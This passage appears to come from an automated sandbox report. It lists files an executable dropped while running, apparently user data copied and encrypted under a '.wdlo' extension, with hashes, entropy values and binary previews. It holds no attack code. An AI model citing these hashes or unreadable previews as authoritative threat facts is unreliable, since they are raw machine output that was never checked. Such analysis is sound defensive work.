                  SSDEEP:6144:Nz3RUZC+LeJ+vK0ZhRekE83Lr9UnaCfYI:N24+LnZhEr83kV
                  MD5:4CED01D21DAF36827CBE71638F9B8D2F
                  SHA1:F116A912B73F8F1C8ACDCD7C28CC26E8D6516751
                  SHA-256:3DB7AA212A0270C979494907FD0218F9B97FE776E19C0CC3A5CA7CC280795CF0
                  SHA-512:03BEAC6591A625121856A65D40164212A4DF51DC8C5F2771DD846821F728654E23F0C61ABEECD6956B863182379F709D64AFFCC8DACF38ADC22609F614088D44
                  Malicious:false
                  Preview:?E...$....DN..].F..$?% .]...".$.o.u..hG..%}T.LV.....x1.....Y.......q...V..D<..xi..Tm..[V..L.>.]...ayUb..\.........fM..g.......{.Lh.l.......A_...2)_..!.@ ^...&k....q_...W.%k.:.j..l..sz.......~..N<k.K._..Y...,.w..S^3i-.:3...~..g.$S.w........P7.R...M.......]./..y..9]jB.6.I....LPr>.Gvo.......{.A(.{....W..f.&.9..N...T....E.4K..&+^H.eU.B.\......Kl..k.-...R...|Vm.F?.i...s.z..3......,.GZ.......^:F.h..;.Y..A-(...(B._.......N[...}W..1........w..a.(..o..mi..7..[\.....v.P.w5..`<.......O..._1.>3|...4..}..q!+."......9P.Xs:SwQ~X.h.x.m.DK...W..&5.%6.`...QJ.1...-.W.V$rVRU...y...XU....,.....e..~2...v*.z.*>.i..1....;...Y.....-/.......z....1...V.q+..>a...SF....dM.`ZRt...$^JR..AQ.......<5,.h.5.s8..`1.k....=.4.-.{......j.j.. .K.P..y....-....r....0s...bC.V. :.-.C.EV.q."....&.|.3..-8W.....!...:`....Io4G....' ...k....O....5h.K.$..K......MR....m.L.J.."%........;O|.|.....[8".w.).Y.j..N..i2.2.....v...%..t.(.e.h..Yx..8....rg....jL...s..\.y..Tv.h.z.........3

                  C:\Users\user\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5200
                  Entropy (8bit):7.9669118466859254
                  Encrypted:false
                  SSDEEP:96:IUQiTHLNxJoCWaSwa5bZG1rQt4hhZbQ4RlKCvSd5GNDaOx/V3GsJtzkpK3:IUQiLJxxRRDLbTKCvdpaYd3jyA3
                  MD5:D363A590CB97D1EC6FC3593882AA32FF
                  SHA1:A7C960E3469C66A8FBFCE413028C2AEF62B73188
                  SHA-256:F5A79F9EB99A109E167AC73042774A99B1F15F9FCF9906FE460E7C529DC13F6B
                  SHA-512:E8C2B7142828C1FCF13F9C93F472F842E42365F4DB933CD2174719B930C2FB81B4CD4C5FA56BA03BFDD05862089C1D11C8C6E2DCD569CB25B0C6B0DD10333CCC
                  Malicious:false
                  Preview:.{.S...z.D..^....p...9%.#.G.. .P.....3.tk....9.ss...+].Z..x;..2b]w.5..&....kNF2z:...e*.q.~p5...S.......<r].Oh0.A..S....g.y....eTC`..T.jt......n1r.5...D....`.%....*..M.,.h...w.....4@'...6)..d'.)#...........y/h...}..}.J'....0.W.y.[.~.R.k........S.'.+...~.5eVM$C.%.^.........$_.....I..ZLG9...bV..Hc..h...=..i~.K.....3....]...-..................ng...@.n.CR......~ ..d}.v./3.o]...{......+P.Z.b...2.P..I.`Z....n....j.D51....(j..'P.d....W.a...D...aW.......=.....&G...h.D.)F'....G2...W..i`.s...[.l..Yh.1t...y.v._\.....z.L...@Q..Gi.=....F........'.q..Y6.~.)KI....bJ.."....m....g...I.d.T...T.......G.ln..;.>.~.....=.5..._hJ.....x.~.(f.Q.o8I.......Y...F.(..d..0.......y^.Z,.D....?joQ3..L&^.I.T.@oH.<.x*;..-.j.n...+.Yh.u..M] HU..).g....."...o(...........\:..9l..1\bu..>.".vF..B5ha.T({...T.....I....^.X.5g......|...e!..v.....S.....x.A.`..m.x..f.]3...b^...J..oj8.QM.-g.X......6.op.,.ZpB3.. ..h.s.s`,2.W/...@...q....A...n.m....u.....9\.........o.^D..o,..(S2x}G.......G=.

                  C:\Users\user\Local Settings\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):988
                  Entropy (8bit):7.759908220610005
                  Encrypted:false
                  SSDEEP:12:TILnqkQqxeBSY+JJOyz4kwHqxkACjLqVKjge/yjeANsDW30zmnH/4VSPAbR36Wcq:M7QieYiKApAsGV3aOs0HgR3zbD
                  MD5:FE13562F706D35A5AD84BEF6F3D6DF1C
                  SHA1:3C0AF8B40B344DCDF42F951962EE93D45047A7AF
                  SHA-256:AD62270FEE62C65B5B7A4E845B72C2FD96E00C0E4F42D6FE1B81BA263F344625
                  SHA-512:945F300593552A509449E2AB3FB08CE91FA8B03D3CBC149A78FC6C213EB2ADD4ED32653F5BCB7276BB0C52C314AF72EDD004D0D8FC60585BAB5D4FA5C9DAAB68
                  Malicious:false
                  Preview:....CC.]'..O..8.....b....{F4)...[...=.)...D..h.m....=...4E.....3.M]h&.H?^_...".%....NX.b....*bs..m...E.p$E.LQ..5....n.+j.{M_\....}.jX...G..&.1x,.{.U.T..D.o-G...l..,.L.zp3...{n5..Sd>k.r.)m.....W.....!.r..%.Dh..Q...u.R..r.J...}.I.dN.PJ.t.....T[3.5..|.v....LbFg...e....a..D..A.ZD.Q.0........E..._.k]......K..R..D.U:6E.Qu-@o..b...D..Tz......y..R.e@..O...*{.{.Z..C{./A..H9!.7k[I.b...C6;.0...<.[..1._@.Wk...5.Y<.Ar..vV.Y.'.... I~....A...uY,ir.S7z.L...%.....=M.\....`.....t).)Z.n._=..f...."6....0Y.....*c[......=z\.mdr..y.XT|%wc.'l..(..x..'.n.q.<cRLH.k{.H.%.nToN.$....!......%...q.s.#.f.|M..7%..........>.{du.x....[).E.5r.%..E2:...9>....~.C..qu......."....5{....m.F.&..6..-..N2......Z4....Y3.......,..'>=K..d...U.E.L.t.vu..K.7..W......ie:......,m....ba.R..GM...h..G..;.#.n.`'C_.m..H.o../k....@....y..5y...i...M&O5...=.......!..[.W..m.(2.j.(.. .Z....y9...i....S.b.9...;....2i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\ConnectedDevicesPlatform\L.user.cdp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1306
                  Entropy (8bit):7.861888957062654
                  Encrypted:false
                  SSDEEP:24:AKFQKS4KImVPFlE5SJ5uu2tPbRjVETPthon25XePUcli29U7vZ/BXrpjD3zbD:xQ6aJE5A5uDVCc25XU27vBB7B3nD
                  MD5:0E905712A396D4E48A9DF655B4C2A06F
                  SHA1:D466BD0E99AA291CAD3F074468C74A033C05FC3E
                  SHA-256:743BC53EC4779A809F058056C8E19728F899D756AA2A3ACAC79B714992F49D91
                  SHA-512:98367CA338ACF9F84A8F7C17AB3F79CF4B3E784C5DDAC534F7491219076569FE23BF728D9D9CFB87D1E55F3173769C29DE910468F7CB69CBDDCF31F55A2AD18C
                  Malicious:false
                  Preview:.{.....'.bt~m....]`..AuD..=...Q!......2..K.u.">h...|l...I...*...T.)l......|..T.nW.O~.J..6..T..+'...^..oR.... lH..e.#Q,.JD...=g..LT8.....Y(y*...2.jN.$2:..Ff..G....^f>..C..>....b..q=..).{'oX..@....t]..k..8..j..e.....(.d([)..&;..D?..I.`.<?."?iO.sZP.S..5....._Bt..n.QW.(.VC%..O.K#......L_...).iS...U.+wu.uNM^k......K%.e....0.Q=.:..:.+..FHM59..t:-...a..[..t...R....!W.........c...j..........L..=.?..{%[.\........ @.t.&E.h......R.i.!......>.....@.....74...lO.qo.H........gi`.F.Sc..*ny....K.i..p..?...V.......9..rn&c<...4.:..DBq.U%......d..e+.q.b......o..r!.8a..k%..+....eu..L4Z.....<./.U..z..L...v...I...J..|a.....@Ja....a.v..J.DG_..bV.........#.......6|.`r'.(.....6...`..w..U.)....2H>..`/.<..._.jk.,.@..v8...R..+%...h"k.k..V...V..).E9..GRl.....Cbx...4..1..m...f..x%#.F..B.F|.|...+j....?...M..H..^..8$..4."J6....2.*........Q..7..kGa...t.T..#.YH..Nv..~...M.U.aAb.....S...2.e..Mh_@..`51Fz.(vI{..Y....."..c."..0...wd.....QR\.u.C4-n.\.....+...j....k.z..W.2

                  C:\Users\user\Local Settings\ConnectedDevicesPlatform\L.user.cdpresource.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):388
                  Entropy (8bit):7.329614808928156
                  Encrypted:false
                  SSDEEP:12:uq7ZamWlUHGzLWZ3rhZqk/w4R36Wcii9a:uq+aAWZ39vYM3zbD
                  MD5:ED2149905A41E284BE1EBD1EC0450CC5
                  SHA1:33A7402BBAC406C025A21DC35A52EB59F424FEF8
                  SHA-256:583D747C5E4CD4D5BFDC68F512A74F9110905CAA8818421402BBF7F4C85D1559
                  SHA-512:185E457F2DB9F7BC9C1688248C28ABD4E2C85228598E59D0B57ADC5C2D2F6743E09AF954859627C854B42BC3B9D19BA7DB954D1054B5CF25F021B4F20577F89C
                  Malicious:false
                  Preview:.{..R...h...3.5...]<.E.7...B*.A%D.L.D.!.I.....&......0M...S.>.....5.c[.94b.J.....7{c.D#Oh 0W..H=Z.10..i.k?w:....$..#......q.....JD.o..n.;...F.l..|p.V..O.jOl...3T.(@H3.ZH...R.A.|k."F..G....&."........Y4W.\...C..kpFW@.y1......a5.r.H/.d..p,r.J$Il..:.cmNp...T.......U...2K .y.^.....ZL2d....>...ei0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65886
                  Entropy (8bit):7.9969456712218445
                  Encrypted:true
                  SSDEEP:1536:OJwGlm0mVw6Yb58uOvuaTGfDCp1aoqWnZoktA4YHn0XywNfLNacuwln:mlmTVw6YbOu8uaTG70NqWZoktCn0X7V5
                  MD5:CD024FCA6A540C5035A6F3D7F6EA083F
                  SHA1:462486D1E9C4EFBE5C33C31B8864F14A56889CDC
                  SHA-256:DB6022CF7A71CB79D72FEE6709BC47FE522EB225950CA8CA6BBA5B144BCCE145
                  SHA-512:3C09ED49FDCDBBE24B93196E2161BD6469F8641D6AFC4A74AC0E099BDC10D1936F94C3648DED05A3DA57A3BDFE26B98A9377F1CB3EA6B891D06BB51159B499DB
                  Malicious:true
                  Preview:...S.W..g...5o...F...w...........c."w.\FiF.j2.l..G^..n.........f.I-...G..a.........)}.g....y..\.*.B.........S5|...."........|.Se.:.,...MC'....d*..:.-..c..U!.s.X+g...F...\.-..H..{;.D.gT...|+.H....kl..J&........../..bW.*.[.....}...T...1..L5...B...g....).n...Q..7..a..\t5....p.._H.J.{MoAO....R.8..Hx;...\HEk...N..}D......e.1cB...E|M.Z'.....7..s..h..<.........*#.....D...C.2y.I.YQ;.}S.=..S.v'.~.;.5..<..N..g'..b..bR}.'%5...|t,Q......a....u.1.\..,.2.\.lV....RX.&...,..b.|.0..."..m..V...S.u.%..<Y.p...aG..p.2..Z].>8.....N].:=..Y>:....W.#p.IK`z.;'p4.[4!......,F9.w.X%....:.Qo.i......#`.$Ek'.q.Wd..!3^....it.<xS..8.h...O........n......S...D......D..(Cb^....!3g.].....ij ...I'.".....N..ur.`...3...3I..q'u....../CoX..&+......Bg.x.R....Q.K......../(.....5.I.....t.w._...<.3.h...;~.H.......{J.....4.R#..wh.Z...[>Onz.P:+..V"....B@X......^GN+.vA.U..4........XvV3..l;.{...}. .e...Kg..q..a%G=.C.f...Q.h...Psl..Y..`X..&8.^....R.-tw.<....o* .I..'Hk,(.D>.K.x..}FC.;......&)e

                  C:\Users\user\Local Settings\D3DSCache\f4d41c5d09ae781\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65536
                  Entropy (8bit):0.30265110633749465
                  Encrypted:false
                  SSDEEP:24:WNP7waVdCqsUFmbtiYrjJKL8qlLOrDvR3SYbP3MfR50vsKV+qrr95+3zbz:swqCq1EiEn9Db/M54xV+0g3nz
                  MD5:B5BF8A1BBDA1F51E33B43D7B1C8B4992
                  SHA1:7C1352F6B0E3F38F6F180F946C0DD02D56683E5E
                  SHA-256:845E8FBF65CB00BFC1687B68283BBC0A00454FCB5358F9059B5840620C37CFC5
                  SHA-512:F95D400BE5BEFFDF2C3E7D829656B7CE439D9A7C2042875F46829344F8580D0575E1BA8C56C9E606AEA8E49614F4B48C8991ACC24A7CFBDC817963DB13F2F542
                  Malicious:false
                  Preview:.....N..........&p......UEUD/.cH..=...JL..`0.H.>....g.Y... ._.k..`#W\Q.).'.,./.5>.-...x)...2I....B>o..K...d....r2...].!.=.x..o f...>..P]x.y.....q"-3..!?"3.r3h..".@.. ...'....3f[n".. &8..cyL.`.#p....S.h.>.{.J.Cj.E.e....M@.......hK....D.~...K.[BW%......9r.p^.)m)..OP.#.v3.O&.....h.N....{.oJ...:...&....@.....t...x....Pjm..k..'.R>.M.t.......;'8............H..s[...\.U...n|.....E....d..IO.&Z..Z...js(Z..c...x3....|........+..$_...q.Uh.#...BA&......|...5...Q..t.G...<..UC..._.;.Z...^.5)@k....vH.f.M..F..X..**3-.F.MQ.......kk.3.j...c.T.E.Rih.hv/u'...{S.....X?.^Y.K.......s..<(.ZG..[[.d,.............L.....#v.....[.M......}>........:_C.!..DTn....JnS.e26V.Gg..^..J.`.r..~%`0.......k....<...l6.... 6$..~....=.>{Ic....Xz4...p'.f.s..ldt.8.d.....$.a..Z*.i........b...[......T....`.|..u.."g=..LA.N8..Mb....Pl(....?#S..O...kQ.P.I.!.K.M.0.......A.q.h..B.['].UD....(..5.%.....5..[..o.1..To...;...x`.M..ZY..........4.g.Z......f....V..&1..|..xU.....4....X.t..\...&.>gp.Q;+P.`

                  C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):49486
                  Entropy (8bit):7.9964193425401255
                  Encrypted:true
                  SSDEEP:1536:+D2layppaCGzVIBn0nsfuVgjFGGtHeid0/:SoaypGhIBn0s++tHs
                  MD5:F86D9EA6791C5F8D13DC96B5C38890BA
                  SHA1:468DF4AFEB879448681CF2895D8C4A82CA9B26CD
                  SHA-256:7057B341CFDFE02171EC3205647B84AFF86D3624234C98B404198A9E25EB9753
                  SHA-512:CCEBC93C248262CD645713DC1EE1C13E69C6972B0F2E79D96917B22975109A53B79DE38D87CC84C38C1A5E575998E38B2773E30EBC0F1E27A883966D97E93C0C
                  Malicious:true
                  Preview:SQLit..V.c....p*....`."..m.e......K.qs.P...A..i...Y......ne2l*@.........,^..bW)U,i.(wT.......g9.HV...k.v9...8.........X.u.w>)....../e.^...2...mD...C7d..../.Y....H|..E2.GY.TSA|.*.,..O....R..(J?.U.....F.........y.s (b7...)..F..[..x(..-z.y......@....&......Wx.h._4.f.N...x.\".;E......R{.7.!&.t..x`.,....(....o.....qm}a...v....}_..ZU>.H...k=&..';..S6I.E..O.Ix.....9.....r.k.Mr.V..r..~..lG....W&..m0..{>..<........wE.[f.ys>..|.F#.`..F.Y.<.7t**z>...e.|C.^...;..!....@...".37z..a.......u.e:.E.L.<...]..o"m.y....)7.ks.^L..h.y"l...d.......[...Q...G.p.o.w/.U..v.zp-...pE..|@.u....q_.H..*.vI.cLz.k..............^2....U\`.R..b."..6n.B..r.....K....Ho.i..5S..a.....V..A....I.."H.....%}."N+Z.../..h.V..#y.....u.-.T....R...U.~.@.yZ..".5....{.......T..8.<L..+.H.....^.3]p.....P..<.9.s....P.-......:...P.n.!....[.UE.mHh....l3.......-.D...P.....7q...fzU....h...5....yO.T...5O..,....=.?kM...7<...n:.k."z.1.#..|wWk.{...../8....".%.b~.3..GY...PfPE.....W...7-/_

                  C:\Users\user\Local Settings\IconCache.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):11317
                  Entropy (8bit):7.981933074079892
                  Encrypted:false
                  SSDEEP:192:eUNsdq4Ngexj1S4ZyqEX+Fj381BDEeG1ZefXAGPH8VlA+DU3ke3llMYFQJ2Qa1:cdq4NgeJg4ZyvX+FLSTnwGPcVlto00My
                  MD5:8DF26E218FD39F5A4D994FAA32C1E25A
                  SHA1:75504488642FA4FE0F13C3122A0A34DDCAEEB851
                  SHA-256:C6741D8685EBAC535475430FCDD1D4049E1C66A8E1D29C3AD67B27389009189E
                  SHA-512:35F2B9A593D23A472610300886774682CDE021F982D3A9D9E4F1E9AF2B91832118F01963CAABDACCED4F1202FD03013A162171038A2E85C6D3D04833EF9D9E29
                  Malicious:false
                  Preview:H...WR...zC.d.(=....7.Y..p..V..ra.U.rc.9nQ...l^.ibd..#q.n.M...KOa*...... ..nR.t........ )............x.x.VB3V....v....+...l.0.........1>vA.....3.Hg.b.>d..{........y.S..f....m..9..Vh.q..O...>....@......@#.]..D.3........~2.?.....M...$!.(...u....@.4...clu..L.8,....N...f@...).....u.s ...h=...;g.N....C..<.....W...gO.r.1..G...Tx..e...@..x'..<...R.7....c~q.._...........B.U.duu......m0>}...`....N.b..."....l.N.3gn.......b.Y..Zu.\.k.%..Y.u..0!.l.u..K...og.....U.~.h..l.2..b..kY.e....<*Qs..^j..K.y.t.+\.d.g......k..c..uB5...|.U.. .....O..)_...!.y@Q..k.G.0....Z...L.D...T.d.0YB8.}.D..C(k...W..4..,......q3...m..2...*....p...]:.?q..iA..O.y!H...Z..*r..F.c4L$f?.y.V.%.....Zh..^..@.....].._}...y6.4k.M.[@/1m....j..:..ic.....O.W.. ...........J........M...$.d.`)...n.3.5@,.+..,.*.&#g..;.....3.... .../$.........wP....*.g.o.....AW+..9y....:.=...cB.I}:pkS...E........I..*.W..k..F~.L..![...&.G.q.UG..>..~_|..Tf.R.}+.u&X0^9....,k...|...Y..FB..l.......o..N)4.ZY.I1.a....

                  C:\Users\user\Local Settings\Microsoft\CLR_v2.0_32\UsageLogs\unarchiver.exe.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):354
                  Entropy (8bit):7.315507192943234
                  Encrypted:false
                  SSDEEP:6:Qbj4ZZywmBz1wGOk8x9+HvsFXKMyUG4Nh225sPZ3Ssr2o9S7Ij+3vK7yjOsVolWL:QHKZ0zLOk8u0DGYglPZ3SXo9SDi7E36Q
                  MD5:DBD6E9ACB7B2D675A5BAE5EF28200BB6
                  SHA1:C21E38BCFCE721A30DA5C91E3C82E1DCC31C4877
                  SHA-256:17AF23B6583AE8C5DDCD42FCB3AFAE8FEBE8E045174455AE4EC979673C60B2C1
                  SHA-512:CAD8732078764F8D859BB0D761D0E6194E5BE9DC062D86B475826BA9542842B0473D5F3BA8C26C19CFFBD771ED9B1BB71446B63CB89A5D3D692357F4F7B3B2CD
                  Malicious:false
                  Preview:1,"fu....g$.h...6..q<.4....x.z.s9x..l..@G5.P.u.r.....G?$v......Y!g.D...s$.m.s....].!:.|.........?a..,.$R..K.g.2X.......9....X.9_..A..c...w.......R.*I1...&...1...L.I..*W.%.u.....b..r+|0.vH.P.PD..Nar......h.M. ....2.9.p..+w.\..~.jm5.b...+x.......'[.?...f.....kgi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\InspectorOfficeGadget.exe.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1554
                  Entropy (8bit):7.876600449835291
                  Encrypted:false
                  SSDEEP:48:DIFxaNI7EGHwVeUZZxIQk6/qRVmcdgwomRd3nD:8DaQ3UZZxj9/Vcdg7q
                  MD5:5C20840E2849147E944177C8BB7BE746
                  SHA1:05B34A4AE3879A5B7AFED6AD1C475C09AEA3A75D
                  SHA-256:89D642A4FFB4DC2837BF718173F6D20D73F584A664055CF17FB057F9C8CD32FC
                  SHA-512:8A2DA564B14A75D8F7961155DCE23D49A828B90975199D061F992EA2B62480B7DD9B114E9229449332B0BEBE41274D428A2DD09CA445959AC22021AC376D564F
                  Malicious:false
                  Preview:1,"fu_C:.d.{.w..QI.<7n=.k.aM.s.U&.#..V....qT..m.Z.Qo.p"..9X.f..r.KD.o..'.....).....M.V.y...N...^..A.Si.)i..?.;..\...-%I[.;b.............L..S.~......AH......\..S./.B.85.:f.a.[v@G..w.O...L..g)........w.tC#E.T.}..(......{...._.X.1...@...X0.U... .U6Z.oh...)..+.Eb.Cx.8R.....w5..}..T..c.^Z.G.5../..3...1C.Q.5i-.B#>.M.G..c.b.6...1t..;0E.b.~.?..4v..M-S...u...5_.}.u.;..c..w....v.....[J..=.p].K#..}.V:K}..>..yk0."..mt.T...q..SN......C...7...V.\~/BW!Od...q..n!.O.....".q..P.....1....J.Le....S.....E1.....M2.s._.....!....=~...g.-.O.zh.I.x....eh.\..g.+WRe!...T...p<H..g..."R.....I@..c8a.+m.9....A....,..=.k...?...c.'.......=.d.B0....z......m..d......~..........{F-....P.Pc.....O;"...;.f&.......RT.G.}.R.(hG..l=so..'.0h...k<7.......gy..=..U+B] .......~.....L..(la.j...~..R.w!i5)E....*...d..\d3...y)@..c[..j....L...O$[..a.`.@f...e.........Q.r.X].T.z.....`_5Q..r..=..".xi..T..........j.*ZL1.7.aEy;v.....o..cl..4.....z.m.8.H[...Y..%.......z:.C.q............U].....x./..T

                  C:\Users\user\Local Settings\Microsoft\CLR_v4.0\UsageLogs\LocalBridge.exe.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1952
                  Entropy (8bit):7.878598094830672
                  Encrypted:false
                  SSDEEP:48:ZPGXSbkLaktzmRiyYy389fNrSpe9Lk0RrFn6w3nD:ZOpntLRlh40RrJ6K
                  MD5:EB3137F3CDE567C0F125854E8BF54D5A
                  SHA1:DFBF7DE5FB4EA0D9A8FEF0666CFAEBEF87DBDC74
                  SHA-256:C168D40D30D5589594A4300031314BEAF7F4C3E24EF187696624E50516FD949B
                  SHA-512:20A401C44096F386D87A3489D6EFC635F7AB67E60D8379D6A9A84BB1ED7F05F1A21116ECA92FAF2C6296637AF0510AD2735C657C228D992D24B4AC5D4122B7FB
                  Malicious:false
                  Preview:1,"fu......2.&."..>..UT.M.C..T...sm.....+&.;...g........#......t.~.y..b|..2.....`.bH.<..?..K..%..L#9...0.WZ.-X"......I..5.np...>..l...>F.Eh..1k.l.....G..v&.S.7@..BfY6=pod.b.Hc.....=wN......)Du.....[...{J_/=..C..r..~..q...5.....4..J.pZ.......A...q.g.z..5.t`8z.+..'....}..I....].I"."n..%c..s..~/......R2..N.-E..r`..I^~:. ..S.s..>..FN?P.u..+...{k.]..$%.../^P.......1pk...@.s`h....z......&.."`h]..$.KZ<J[.m.`...........{^...{.5.........zB1.s........M7.s..@.H...K.g...B..j-...m.;._.&.s...W..."..A.....Q.1br9?.......l..,<..._\.)=.....q....q.f.....l...\.i...;.!...N.\./......&..a.?e..kx......VH..)C....L...6.~..CRVW..?.D$_/TA......s..D.#8.r..SF......Sgy..x.H......A w..[.!....F<.P.b..i.D....0..G/?n............A.-htO..>j.~.S.$..y.\w7.3.E...JI.7s..6.....4.o..-.^-...h.....H....;.r..+.../..H.....)...k...7........i.-..T..0..#...F......1y.[@..<..."...x)#5.&.<.....7?\..PVc...Q.8AZ)E..%...V..#.. ..?.zN...).....r.........S.wu..f....N}.O.._.T.Y.z...._!W.G....x....

                  C:\Users\user\Local Settings\Microsoft\FontCache\4\CatalogCacheMetaData.xml.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):2203
                  Entropy (8bit):7.92824706152312
                  Encrypted:false
                  SSDEEP:48:4DGephXbJzwrd7yUg1m0M9zxKax/kbhevdnYIW/qNs3w6g3nD:4D7h+RyUgQ0M9z4aCb7D/qNs3W
                  MD5:95C0621F0BD51779F6F8F2F909EB3067
                  SHA1:64E831CF4047216C384C3432206C54E1970C0DA2
                  SHA-256:7B770EBDD38DB7005C0750DFF918FC9D4DEF1283675AD7D3DE7E4BB478ACBD1E
                  SHA-512:3EA6EE30DFAE214B644812200A799D0F85C679D3C260CA932BBF88F6687F896A20ECF9D72C04EC4D5B83D5E5EC58B5A3BAD76470B97F43920E8394B9E5220ABD
                  Malicious:false
                  Preview:<?xml3.&.............-......Q..{...76.H4..a..t.....o=:...)..~h.E..z..........Z.k..O..o.z..'......N_#..i.f....;\=..c.l.H...7.#<..T.....G.Y1:.'?.........g....E.or....K....C......E.H!#...\-."...$.......K.z..+p,...P*...%..!.....@3..(19.og$..mY"....t..x8P.3.6......!V.O%.6n.2.k....,=.O9J...X.X..T_.a.,....=..$f....YG.'.N".....y..~.S........7;..#..!0....W.'....c......../*9..<$Y<R.{v._..*60..B..i.,cr.....]....n.]...."....K....ua...?....c..-..kx..eD...2...T....Z...{0.7........"..[..H.,.S..1.o.S....yuH\..RW.Wz......Y#...l. .=.......7.g:..[.h..\..F...v.Qb?....... .p..Dh4.s|..b.....D.....X!...[...6..#@.."..-...|.hfO..r...x.k.>Fw....`;.d..r....c...~..pp..F../J...\,.2;..\.ID.."...O.....*.id.3..~.JK.(.g2.:.A.d;P......;.V)G.Wm&.}.M.w0.*cg^_..1.....Y....$....h.d..h...\*M....82*.7.W~ s...)t.U..r....|....Jx0(....a..z.n.B..!i./s..0.>.Zfp.s&..{...c.VMN.j...^.T.........;R{\.n......O.....bUU.f..1V1.t'z....>.....b1q.GD.Z.<....q...r..~T.....u."K...}....R..!....a..p/

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.chk.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.975255187887271
                  Encrypted:false
                  SSDEEP:192:B4iShWP7qI4ieeIzDuGBArYbtF4qxV6gHrJcEF8Fu:W/hWjqEeewuG2SxV6tQ
                  MD5:C432A6E5E8DCAD54CDEEE0571D5659DB
                  SHA1:60F7A6C018C652242393840AC4FADDC63A4E3D8E
                  SHA-256:9813A49FECE2FA12F2D710C0433C2C0536DE79241F7CE999662610C5C637130C
                  SHA-512:1841D4CCF3017410A8FFB9F5924EB1C68C627914DA137E6B40F485F1C537E4DA6621A561F561CBF4677CE13FA5670474BBC3D183E59A6095712487B3E07C13F6
                  Malicious:false
                  Preview:.._.\..O^....R.!...#....|3...9b;....Y.u....R.......-p.....%.......l``...+.e.R....'...6S..:\.(..5...C......Q.q...`..l.\...~.....Q.....R)....T....i..>....Q.v.v.CR.c=.....yuj<..._...7*2$.H_...F%.h..9......3..,.J..18.z...s....).I\=..X@y.%WO..Y.!.TJ....?..!.'.3..ioR...........^p.A.-&g.=.u..`..~.z.O.)....9.O..K..8Y`.Y........v.Yh..a.t..1;p..D......w.[....L.p..aS...|.;.....){|S.f.....u.|B.....%.H..=.T.....#... ........^...}.2.H1.Zv..<l... .]...S~O.E9..w@..:J./.=.D.-..W.2Zw....C.W ..E...u.sb-...3|.!.C..M...N..A.#..ouq.[S..*..y...bRM.tL..P..%.....lD./1....Z.QJE`.C........~..PG...+...)..7h.:.w..2..3..u....v*xv.........".p....V...6]?..OVl..W4i.]..DnY...*..lV..u.d.7...b...Q.<P.S.X..<h.)9W..Ij.t.3...akz..@...dhT...|.......G.^.....x..j.8.o=4.(S...z..%7$.....n8......Wi...r......Z.......C...~.kP..H......!...!......Y..+..6'.L...<..b....5N.1`0.,3]..k.K.@FAs..1{........E...U....$.i..k.Cx.&...!8B...C.t..)..'V..P..a/.3.,3.d.]...7.Y...Cq

                  C:\Users\user\Local Settings\Microsoft\Internet Explorer\CacheStorage\edb.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
